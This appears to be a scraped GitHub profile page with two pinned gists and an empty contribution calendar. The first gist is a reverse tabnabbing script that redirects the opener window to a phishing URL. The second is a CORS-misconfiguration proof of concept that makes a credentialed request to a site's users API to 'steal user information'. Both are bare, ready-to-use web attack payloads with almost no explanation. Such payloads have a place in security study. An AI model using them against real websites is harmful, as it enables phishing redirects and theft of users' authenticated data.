Pinned Loading
-
Reverse Tabnabbing Web Attack | OWAS...
Reverse Tabnabbing Web Attack | OWASP Foundation 1<script>
2if (window.opener) window.opener.parent.location.replace('http://phishing.com');
3if (window.parent != window) window.parent.location.replace('http://phishing.com');
4</script>
-
Cross-origin resource sharing miscon...
Cross-origin resource sharing misconfig | steal user information 1<html>
2<script>
3var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://redacted.com/api/users/number',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
4</script>
5</html>
-
-
google/leveldb
google/leveldb PublicLevelDB is a fast key-value storage library written at Google that provides an ordered mapping from string keys to string values.
0 contributions in the last year
Day of Week | April Apr | May May | June Jun | July Jul | August Aug | September Sep | October Oct | November Nov | December Dec | January Jan | February Feb | March Mar | |||||||||||||||||||||||||||||||||||||||||
Sunday Sun | |||||||||||||||||||||||||||||||||||||||||||||||||||||
Monday Mon | |||||||||||||||||||||||||||||||||||||||||||||||||||||
Tuesday Tue | |||||||||||||||||||||||||||||||||||||||||||||||||||||
Wednesday Wed | |||||||||||||||||||||||||||||||||||||||||||||||||||||
Thursday Thu | |||||||||||||||||||||||||||||||||||||||||||||||||||||
Friday Fri | |||||||||||||||||||||||||||||||||||||||||||||||||||||
Saturday Sat |
Less
No contributions.
Low contributions.
Medium-low contributions.
Medium-high contributions.
High contributions.
More